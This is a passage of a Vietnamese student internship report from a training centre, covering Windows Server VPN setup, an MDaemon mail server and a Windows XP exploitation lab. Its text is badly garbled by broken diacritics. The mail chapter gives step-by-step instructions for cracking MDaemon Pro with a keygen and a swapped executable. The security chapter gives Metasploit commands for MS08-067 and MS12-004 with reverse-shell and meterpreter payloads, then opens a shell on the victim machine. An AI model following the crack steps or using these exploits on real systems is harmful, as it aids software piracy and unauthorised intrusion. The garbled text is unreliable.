Ch n routing and remote access services -> nextọ
Nh v y là đã cài xong gi đi c u hình ư ậ ờ ấ
57
Vào start -> administrative ->routing and remote access
Ch n server -> click ph i configure ọ ả
Ch n Custom configuration -> next ọ
58
Ch n VPN access + Demand – dial connections + Lan routing -> next ọ
Ch n start serviceọ
Ch n tab Network interface -> click ph i ch n new demand-dial interfaceọ ả ọ
59
Nh p interface name : saigon -> next ậ
Check connect using vitual private networking (VPN) ->next
Check ch n point to point -> next ọ
60
Nh p đ a ch ip card CROSS c a máy server2 -> next ậ ị ỉ ủ
Check ch n route ip + adda user account ọ
Add static route 172.16.2.0 (đ ng m ng LAN c a máy server2) -> nextườ ạ ủ
61
Nh p password c a user saigon mình đã t o ban đ u -> nextậ ủ ạ ầ
Nh p user name :ậ hanoi
Password c a user hanoi mình đã t o ban đ u -> next ủ ạ ầ
Ch n properties server ọ
62
Ch n tab IPv4 và add vào chu i đ a ch ip sẽ nh n khi connect vàoọ ỗ ị ỉ ậ
Apply + OK
Properties network interface saigon v a t o ừ ạ
63
Ch n tab L2Tp ipsec VPN và nh p key ọ ậ
Properties server ch n tab security -> check ch n allow custom IP sec policyọ ọ
for L2TP connection -> Apply -> OK
Click ph i network interface saigon server1 -> ch n connectả ở ọ
64
Click ph i network interface hanoi server2 -> ch n connectả ở ọ
Xem k t qu connected r i qua máy client 1 ping máy client 2 và ng c l i đế ả ồ ượ ạ ể
xem k t quế ả
2.4. Kiểm tra.
Lúc này t PC1 s ping thông qua PC4.ừ ẻ
65
Ch ng 9 ươ
MAIL TRÊN VPS.
1. Cài đ t MDmoon v10ặ .
Các b c cài đ t đã h ng d n trên localhost.ướ ặ ướ ẫ
2. Cấu hình MDmoon v10.
Đăng ký Domain
Ta truy c p vào dot.tk đ đăng ký domainậ ể
Sau khi ch n xong domain ta click GO.Click vào s d ng DNS, ch n tab D ch Vọ ử ụ ọ ị ụ
DNS c a Dot.tk, nh p IP c a VPS vào 2 hàng đ a ch Ipủ ậ ủ ị ỉ
Sau đó ch n th i gian duy trì domainọ ờ
66
Nh p ký t đ xác nh n là ng i s d ng ch không ph i robot, r i click :ậ ự ể ậ ườ ử ụ ứ ả ồ
ĐĂNG KÝ
L a ch n tài kho n qu n lý tên mi n:ự ọ ả ả ề
Click “Đăng nh p vào My Dot” đ tùy ch nh các thông s cho domainậ ể ỉ ố
67
Sau khi đăng nh p vào my.dot.tk. Ta click vào Go to domain ho c Domain panelậ ặ
đ vào danh sách các domain đã đăng ký.ể
L a ch n domain c n đăng lý sau đó click Modify:ự ọ ầ
Cu i cùng là Save Changes.ố
Mail Server Mdaemon
Đ nh Nghĩa:ị
Mail Server là m t máy ch cung c p d ch v vi t g i và nh n th trênộ ủ ấ ị ụ ế ử ậ ư
internet.
Đ t o 1 mail server thì có nhi u ph n m m , nh ng n i ti ng nh t đó làể ạ ề ầ ề ư ổ ế ấ
Mdaemon.
Các b c chu n b :ướ ẩ ị
1VPS làm Mail Server
Ph n m m Mdaemon b n proầ ề ả
1 Domain đã add record (MX record).
Ti n hành:ế
Trên máy VPS ta cài Mdaemon và crack thành b n pro (vì b n pro m i choả ả ớ
phép g i và nh n mail t các d ch v mail khác, con b n free ch cho g i mailở ậ ừ ị ụ ả ỉ ở
n i b )ộ ộ
Cách cài Mdaemon Pro:
Ta ch y file setup MDv10.exeạ
68
Đi n Lience name : (tùy ch n)ề ọ
Company name: Tên Công Ty
Registration Key: Ta l y trong keygen th m c crackấ ở ư ụ
Copy dãy ch s này paste vào Registration Key Sau khi paste key vào ta clickữ ố
Next.L u ý không check vào Install the Limited.ư
69
Đ i quá trình cài đ t hoàn t tợ ặ ấ
Đi n domain (mà ta đã đang ký dot.tk lúc nãy vào) Domain nameề ở
Đi n vào tên và đ a ch mail cũng nh m t kh u cho tài kho ng adminề ị ỉ ư ậ ẩ ả
70
71
Đi n vào IP c a VPS :ề ủ
Click Next
Ta b d u check( Không ch n vào) “Start MDAEMON”ỏ ầ ọ ở
72
Copy file Mdaemon.exe trong th m c crack vào th m c cài đ t Mdaemonư ụ ư ụ ặ
(C:\Mdaemon\apps) r i kh i đ ng Mdeamonồ ở ộ
Click Yes
Ta kh i đ ng Mdaemon lên r i t o User mailỏ ộ ồ ạ
73
Ta vào Account>>New Account đ t o usersể ạ
Ta t o User nguyen van a:ạ
74
Đ b gi i h n password->account->account setting>b check requite strongể ỏ ớ ạ ỏ
pw
T o thêm m t tài kho n nguy n văn bạ ộ ả ễ
75
Xem c u hình các tài kho n:vào account>edit accountấ ả
Test Trong IE gõ đ a ch http://192.168.1.1:3000ị ỉ
Đăng nh p tài kho n nguyen van aậ ả
76
Trên mail server ta dùng tài kho n nguyen van a gui mail cho nguyen van bả
Đăng xu t và đăng nh p t ng t vào tài kho n nguyen van bấ ậ ươ ự ả
77
Ta sẽ th y đ c tin nh n t tài kho n aấ ượ ắ ừ ả
78
K t thúc mail mdeamon.ế
79
Ch ng 10 ươ
CH NG 10: B O M T WINDOWS.ƯƠ Ả Ậ
1. Khai thác lỗ hổng trên Windows XP với mã lỗi MS08_067
Chu n b 2 máy o: Windows XP (n n nhân) và máy Back Track 5r3 (máy t nẩ ị ả ạ ấ
công n n nhân)ạ
Trên máy Back Track c u hình đ a ch IP trong bài lab này cho máy là:ấ ị ỉ
192.168.154.128
Các b c th c hi n:ướ ự ệ
Ki m tra m ng gi a XP và máy Back Track 5r3:ể ạ ữ
Máy Back Track 5r3:
Máy Xp:
80
Ki m tra thông m ng:ể ạ
Trên máy Back track 5r3 ta gõ đ ng d n: cd /pentest/exploits/frameworkườ ẫ
Ta ti p t c gõ l nh:ế ụ ệ
./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129
LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp
81
Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.
Sau đó, ta ch cho máy Back track 5r3 t n công Xpờ ấ
Cu i cùng ta đã t n công đ c Xp, ta bi t đ c các thông s c a máy XPố ấ ượ ế ượ ố ủ
2. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004
Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3
Trên máy Back track vào ch ng trình terminal và gõ l nh msfconsoleươ ệ
82
Tìm mã l i b ng công c metaploit b ng cách gõ l nh search ms12_004ỗ ằ ụ ằ ệ
Sau khi seach đ c mã l i ta dùng l nh use và copy mã l i đã tìm đ c.ượ ỗ ệ ỗ ượ
Dùng l nh show options đ bi t thêm các câu l nh c n thi t.ệ ể ế ệ ầ ế
83
Dùng l nh SRVHOST ệ <đ a ch ip máy backtrack>ị ỉ
Dùng l nh set PAYLOAD windows/meterpreter/preverse_tcpệ
Dùng l nh set LHOST ệ <ip backtrack>
Dùng l nh exploit đ ti n hành khai thác l i. ệ ể ế ỗ
Chú ý đ ng d n ườ ẫ http://192.168.1.2:8080/n u máy n n nhân vào đ ng d nế ạ ườ ẫ
này sẽ b hack.ị
84
Tr l i máy Windows XP. Ki m tra đ a ch IP máy XP. V i đ a ch ip máy XP làở ạ ể ị ỉ ớ ị ỉ
192.168.1.3
Trên máy XP ta vào trình duy t web và gõ đ ngệ ườ
d nẫ http://192.168.1.2:8080/
Trên máy Back Track b t đ u nh n th y có s k t n i đ n đ a chắ ầ ậ ấ ự ế ố ế ị ỉ
Và nh n th y có đ a ch k t n i vào. Và t o phiên k t n i vào nó.ậ ấ ị ỉ ế ố ạ ế ố
Trên máy back track ta gõ l nh sessions đ ki m tra.ệ ể ể
85
Dùng l nh sessions –i 1ệ
Xem tr c thông tin XP:ướ
86
Trên máy backtrack gõ getuid đ bi t thông tin máy Xp, và tài kho n đang truyể ế ả
c p.ậ
Gõ sysinfo đ bi t thông tin chi ti t máy Xp:ể ế ế
Gõ l nh shell đ vào đĩa máy XP:ệ ể ổ
Gi thì ta có th xem đ c các file trong đĩa c a máy XP.ờ ể ượ ổ ủ
87
Ch ng 11 ươ
K T LU NẾ Ậ
1. Các kết quả đạt được:
Sau khi tìm hi u và tri n khai các d ch v trên máy o VMWare và VPS emể ể ị ụ ả
đã có ki n th c v :ế ứ ề
- Nguyên lý c b n c a h đi u hành m ng, ki n th c v h th ng m ng,ơ ả ủ ệ ề ạ ế ứ ề ệ ố ạ
có kỹ năng c n thi t đ cài đ t, c u hình hoàn ch nh m ng doanh nghi pầ ế ể ặ ấ ỉ ạ ệ
c v a và l n d a vào Windows Server 2008.ỡ ừ ớ ự
- Hi u v c u trúc h t ng, thi t k và qu n tr h th ng m ng, nhi m vể ề ấ ạ ầ ế ế ả ị ệ ố ạ ệ ụ
qu n lý bao g m vi c đi u hành và h tr h th ng.ả ồ ệ ề ỗ ợ ệ ố
- Tri n khai, thi t k , qu n lý và chu n đoán h ng hóc cho m t h th ngể ế ế ả ẩ ỏ ộ ệ ố
m ng.ạ
- Có các ki n th c trên n n t ng công ngh Windows Server 2008.ế ứ ề ả ệ
2. Kinh nghiệm thực tế
- Có cái nhìn th c t v vi c c u hình, qu n lý m t h th ng m ng c aự ế ề ệ ấ ả ộ ệ ố ạ ủ
m t doanh nghi p thông qua n n t ng.ộ ệ ề ả
- Đ c tr c ti p ti p xúc nh ng công ngh và thi t b mà tr c đây chượ ự ế ế ữ ệ ế ị ướ ỉ
bi t đ n thông qua sách v .ế ế ở
- Đ c v n d ng nh ng ki n th c ti p thu trên l p vào công vi c th c t .ượ ậ ụ ữ ế ứ ế ớ ệ ự ế
- B sung và trau d i nh ng thi u sót v ki n th c trong quá trình h cổ ồ ữ ế ề ế ứ ọ
trên l p.ớ
- Tr c ti p tri n khai và c u hình trên máy ch o VPS.ự ế ể ấ ủ ả
- Có kinh nghi m trong vi c kh c ph c s c khi h th ng g p l i.ệ ệ ắ ụ ự ố ệ ố ặ ỗ
3. Hoàn thiện bản thân
- Các thành viên trong nhóm đã đ nh h ng rõ ràng m c tiêu s p t i sẽị ướ ụ ắ ớ
làm.
- T tin h n trong vi c giao ti p v i m i ng i trong công vi c.ự ơ ệ ế ớ ọ ườ ệ
- Nâng cao kh năng làm vi c nhóm cũng nh kh năng t b n thân gi iả ệ ư ả ự ả ả
quy t v n đ khó khăn g p ph i trong công vi c.ế ấ ề ặ ả ệ
88
4. Các kiến thức được lĩnh hội
- Ki n th c th c t v h th ng m ng c a doanh nghi p.ế ứ ự ế ề ệ ố ạ ủ ệ
- Hi u các thành ph n công ngh m ng doanh nghi p v a và nh .ể ầ ệ ạ ệ ừ ỏ
5. Kết luận.
Nhìn chung các công vi c em đã c b n hoàn thành, tuy nhiên sẽ còn nhi uệ ơ ả ề
thi u sót, đa ph n là quá trình t h c. Vì th mong Th y cô, các b n đánh giáế ầ ự ọ ế ầ ạ
và đ a ra nh ng ý ki n đóng góp đ kh c ph c và sư ữ ế ể ắ ụ ửa ch a. Bên c nh trình đữ ạ ộ
chuyên môn cũng c n có nh ng kỹ năng m m nh kỹ năng giao ti p, làm vi cầ ữ ề ư ế ệ
nhóm cũng h t s c quan tr ng. Th c t p là giai đo n quan tr ng c a sinhế ứ ọ ự ậ ạ ọ ủ
viên, giúp sinh viên có c h i làm vi c th c t nh m c ng c kĩ năng, chu n bơ ộ ệ ự ế ằ ủ ố ẩ ị
cho giai đo n làm vi c th t sau khi t t nghi p.ạ ệ ậ ố ệ
Trong quá trình th c t p t i Trung tâm ATHENA, nhóm chúng em đ c ti pự ậ ạ ượ ế
xúc v i m t môi tr ng làm vi c chuyên nghi p, các công ngh , thi t b ,cácớ ộ ườ ệ ệ ệ ế ị
mô hình th c t ... Qua đó nhóm h c h i đ c nh ng kinh nghi m nh t đ nh vàự ế ọ ỏ ượ ữ ệ ấ ị
có nh ng suy nghĩ đóng góp sau:ữ
V công vi c: Đ thi t k và tri n khai m t h th ng m ng cho m t côngề ệ ể ế ế ể ộ ệ ố ạ ộ
ty, c n có nhi u b ph n ph i h p v i nhau đ th c hi n và hoàn thành dầ ề ộ ậ ố ợ ớ ể ự ệ ự
án.
V phát tri n kỹ năng:Đ các b ph n có th ph i h p t t m i nhân viênề ể ể ộ ậ ể ố ợ ố ỗ
c n có nh ng kỹ năng c b n đ làm vi c trong đ i, nhóm:ầ ữ ơ ả ể ệ ộ
o Làm vi c nhóm: Kỹ năng làm vi c nhóm là kh năng làm vi c hi uệ ệ ả ệ ệ
qu trong đ i ngũ. Đó là vi c có th s d ng đúng ng i đ có đ cả ộ ệ ể ử ụ ườ ể ượ
k t qu t t nh t và luôn s n sàng đ có th lãnh đ o ho c ph i h pế ả ố ấ ẵ ể ể ạ ặ ố ợ
làm theo.
o Tìm hi u – thu th p thông tin: Qu n lý thông tin là kh năng bi tể ậ ả ả ế
đ c n i đ có đ c thông tin c n thi t - đ tìm ki m, đ nh v , vàượ ơ ể ượ ầ ế ể ế ị ị
thu th p nó. Đi u này có th liên quan đ n vi c s d ng các ngu nậ ề ể ế ệ ử ụ ồ
l c khác nhau, cho dù chúng là t nh ng con ng i ho c t các tàiự ừ ữ ườ ặ ừ
li u trong th gi i r ng l n c a công nghệ ế ớ ộ ớ ủ ệ
o Kỹ năng gi i quy t v n đ - Tính linh ho t : Tính linh ho t là khả ế ấ ề ạ ạ ả
năng thích nghi đ gi i quy t công vi c chúng ta g p ph i hàng ngàyể ả ế ệ ặ ả
89
trong công vi c l n đ i s ng riêng. Gi i quy t v n đ là xác đ nhệ ẫ ờ ố ả ế ấ ề ị
v n đ , nghiên c u gi i pháp và đ a ra nh ng quy t đ nh hi u qu . ấ ề ứ ả ư ữ ế ị ệ ả
V công ngh : v i l i th là công ty ho t đ ng trong lĩnh v c công nghề ệ ớ ợ ế ạ ộ ự ệ
thông tin, ATHENA có h t ng CNTT hi n đ i ,an toàn và thông su t .ạ ầ ệ ạ ố
Clip gi i thi u b n thân :ớ ệ ả
https://www.facebook.com/huyiuh/videos/416768061817489/?
ref=notif¬if_t=video_processed
https://www.youtube.com/watch?v=9haI8NRiedE
Demo up youtube.com
Share permission: https://www.youtube.com/watch?v=Rl32CPUhcKo
NTFS Permission: https://www.youtube.com/watch?v=R5N_Gs_ICLI
FSR Manager : https://www.youtube.com/watch?v=OgD67PLnQeE
Disk quota: https://www.youtube.com/watch?v=T3Q_BwQJo7c
Domain: https://www.youtube.com/watch?v=9BaOz9v_HWs
HomeFolder userProfile: https://www.youtube.com/watch?v=p4nza3-JvTM
OU: https://www.youtube.com/watch?v=P9PGctl8MZY
Group policy managerment: https://www.youtube.com/watch?v=J-
dqKQMGCOE
DeploySofttware: https://www.youtube.com/watch?v=lHtOKZRLWok
Remote desktop : https://www.youtube.com/watch?v=ImmbG3Cx10I
DHCP: https://www.youtube.com/watch?v=41JFHJQZHRM
IIS-DNS: https://www.youtube.com/watch?v=koZ2DwDB3FM
VPN: https://www.youtube.com/watch?v=QfiVwjotJoM
Mdaemon: https://www.youtube.com/watch?v=cTorSEuLjJ8
Phishing: https://www.youtube.com/watch?v=Ra1gRZGD4HU
Slide share:
90
91
